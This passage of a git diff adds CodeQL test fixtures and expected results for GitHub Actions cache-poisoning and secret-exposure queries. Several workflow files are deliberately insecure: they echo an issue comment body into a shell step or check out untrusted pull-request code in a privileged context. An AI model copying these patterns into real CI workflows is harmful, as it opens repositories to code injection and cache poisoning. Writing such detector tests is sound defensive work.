a/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref new file mode 100644 index 000000000000..ad4c84615237 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref @@ -0,0 +1,2 @@ +Security/CWE-312/UnmaskedSecretExposure.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml new file mode 100644 index 000000000000..9f19634abc92 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml @@ -0,0 +1,12 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - run: | + echo ${{ github.event.comment.body }} + diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml new file mode 100644 index 000000000000..9c87340d7ab6 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml @@ -0,0 +1,16 @@ +name: Test + +on: + pull_request_target: + branches: [ master, main, dev ] + +jobs: + test: + name: Test + runs-on: ubuntu-latest + steps: + - id: modified_files + uses: trilom/file-changes-action@v1.2.4 + with: + output: "," + - run: echo "${{ steps.modified_files.outputs.files_modified }}" diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml new file mode 100644 index 000000000000..55efe8e9fec9 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml @@ -0,0 +1,23 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml new file mode 100644 index 000000000000..eb6373a406eb --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml @@ -0,0 +1,19 @@ +name: Cache Poisoning + +on: pull_request_target + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml new file mode 100644 index 000000000000..3849d92cbcca --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml @@ -0,0 +1,24 @@ +on: + issue_comment: + types: [created] + +permissions: write-all + +jobs: + pr-comment: + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml new file mode 100644 index 000000000000..d3f51456de2d --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches: + - main + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml new file mode 100644 index 000000000000..ec0f9b0e6c94 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches-ignore: + - foo + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml new file mode 100644 index 000000000000..b9652d46b59f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml @@ -0,0 +1,26 @@ +name: Test + +on: + pull_request_target: + +permissions: + actions: write + +jobs: + generate-results: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Set up Python 3.10 + uses: actions/setup-python@v5 + with: + python-version: "3.10" + - name: Cache pip dependencies + uses: actions/cache@v4 + id: cache-pip + with: + path: ./results/pip + key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} + restore-keys: ${{ runner.os }}-pip- diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml new file mode 100644 index 000000000000..eba5e79229b4 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml @@ -0,0 +1,12 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: write-all + runs-on: ubuntu-latest + steps: + - run: | + echo ${{ github.event.comment.body }} + diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml new file mode 100644 index 000000000000..72106b9d69b5 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches: + - foo + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml new file mode 100644 index 000000000000..31c820904cdb --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches-ignore: + - main + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml new file mode 100644 index 000000000000..f8e1dabf565c --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml @@ -0,0 +1,35 @@ +name: Test + +on: + issue_comment: + +permissions: + actions: write + +jobs: + generate-results: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: Set up Python 3.10 + uses: actions/setup-python@v5 + with: + python-version: "3.10" + - name: Cache pip dependencies + uses: actions/cache@v4 + id: cache-pip + with: + path: ~/.cache/pip + key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} + restore-keys: ${{ runner.os }}-pip- + - name: Download artifact + uses: actions/download-artifact@v4 + with: + name: results + path: results/ + - name: Upload results + uses: actions/upload-artifact@v4 + with: + name: results + path: results/ + if-no-files-found: ignore diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml new file mode 100644 index 000000000000..9afe62d69da0 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml @@ -0,0 +1,23 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - uses: actions/cache@v2 + with: + path: ~/.grade/caches/ + key: poison_key + - run: | + cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml new file mode 100644 index 000000000000..b39bc7a880f9 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml @@ -0,0 +1,23 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - uses: actions/cache@v2 + with: + path: /tmp/caches/ + key: poison_key + - run: | + cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml new file mode 100644 index 000000000000..e2c435af62de --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml @@ -0,0 +1,21 @@ +on: + issue_comment: + types: [created] + +permissions: + issues: write +jobs: + pr-comment: + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - run: | + ./checkedout/poison + diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml new file mode 100644 index 000000000000..be1533f22312 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml @@ -0,0 +1,17 @@ +name: Test + +on: + pull_request: + push: + branches: + - main + +jobs: + test: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Compare the expected and actual dist/ directories + run: bin/check-build-output-in-dist-directory diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml new file mode 100644 index 000000000000..05f8e4a067a1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml @@ -0,0 +1,37 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + runs-on: ubuntu-latest + permissions: read-all + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + - run: ./checkedout/poison + + pr-comment2: + runs-on: ubuntu-latest + permissions: read-all + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + - uses: ./.github/actions/node-npm-setup + + pr-comment3: + runs-on: ubuntu-latest + permissions: read-all + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + - run: node .github/actions-scripts/what-docs-early-access-branch.js diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml new file mode 100644 index 000000000000..60ba26406c62 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml @@ -0,0 +1,27 @@ +name: Test + +on: + # Runs on pull requests targeting the default branch + pull_request_target: + branches: ["main"] + +jobs: + build: + # Limit permissions of the GITHUB_TOKEN for untrusted code + permissions: + contents: read + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - name: Setup Pages + uses: actions/configure-pages@v5 + - name: Build with Jekyll + uses: actions/jekyll-build-pages@v1 + with: + source: ./ + destination: ./_site + diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml new file mode 100644 index 000000000000..8539bf2bda43 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml @@ -0,0 +1,19 @@ +name: Publish + +on: + pull_request_target: + +jobs: + build-and-upload: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + + - name: Checkout PR + uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - run: npm run build -w www diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml new file mode 100644 index 000000000000..6e2351c17446 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml @@ -0,0 +1,18 @@ +name: OpenAPI +on: + pull_request_target: + +permissions: {} + +jobs: + + openapi-base: + runs-on: ubuntu-latest + permissions: read-all + steps: + - name: Checkout repository + uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: ./foo diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml new file mode 100644 index 000000000000..9742bd01a48a --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml @@ -0,0 +1,28 @@ +name: Test +on: + pull_request_target: + branches: ["main"] + +permissions: + contents: read + pages: write + id-token: write + +jobs: + build: + permissions: + contents: read + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - name: Setup Pages + uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 + - name: Build with Jekyll + uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 + with: + source: ./ + destination: ./_site diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected new file mode 100644 index 000000000000..9cfac091f675 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected @@ -0,0 +1,10 @@ +edges +| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | provenance | | +nodes +| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | semmle.label | Uses Step: modified_files | +| .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | +| .github/workflows/neg_code_injection1.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select +| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning ($@). | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/code_injection1.yml:2:3:2:15 | issue_comment | issue_comment | diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref new file mode 100644 index 000000000000..8ac48aad93e0 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref @@ -0,0 +1,2 @@ +Security/CWE-349/CachePoisoningViaCodeInjection.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected new file mode 100644 index 000000000000..4cc8536b5943 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected @@ -0,0 +1,52 @@ +edges +| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step | +| .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | +| .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:22:9:23:21 | Run Step | +| .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:18:9:19:21 | Run Step | +| .github/workflows/direct_cache3.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | +| .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:23:9:24:21 | Run Step | +| .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:21:9:22:21 | Run Step | +| .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:21:9:22:21 | Run Step | +| .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step | +| .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | +| .github/workflows/neg_direct_cache1.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | +| .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:21:9:22:21 | Run Step | +| .github/workflows/neg_direct_cache2.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | +| .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:21:9:22:21 | Run Step | +| .github/workflows/neg_direct_cache3.yml:13:9:14:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | +| .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:22:9:23:21 | Run Step | +| .github/workflows/neg_direct_cache5.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step | +| .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:22:9:23:21 | Run Step | +| .github/workflows/neg_poisonable_step1.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | +| .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | .github/workflows/neg_poisonable_step1.yml:19:9:20:30 | Run Step | +| .github/workflows/neg_poisonable_step2.yml:13:9:16:6 | Uses Step | .github/workflows/neg_poisonable_step2.yml:16:9:17:54 | Run Step | +| .github/workflows/poisonable_step1.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | +| .github/workflows/poisonable_step1.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | +| .github/workflows/poisonable_step1.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | +| .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step | +| .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | +| .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | +| .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | +| .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | +| .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | +#select +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache2.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache3.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache5.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache6.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref new file mode 100644 index 000000000000..9d1910990fc0 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref @@ -0,0 +1,2 @@ +Security/CWE-349/CachePoisoningViaDirectCache.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected new file mode 100644 index 000000000000..6b1a3e873134 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected @@ -0,0 +1,53 @@ +edges +| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step | +| .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | +| .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:22:9:23:21 | Run Step | +| .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:18:9:19:21 | Run Step | +| .github/workflows/direct_cache3.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | +| .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:23:9:24:21 | Run Step | +| .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:21:9:22:21 | Run Step | +| .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:21:9:22:21 | Run Step | +| .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step | +| .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | +| .github/workflows/neg_direct_cache1.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | +| .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:21:9:22:21 | Run Step | +| .github/workflows/neg_direct_cache2.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | +| .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:21:9:22:21 | Run Step | +| .github/workflows/neg_direct_cache3.yml:13:9:14:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: 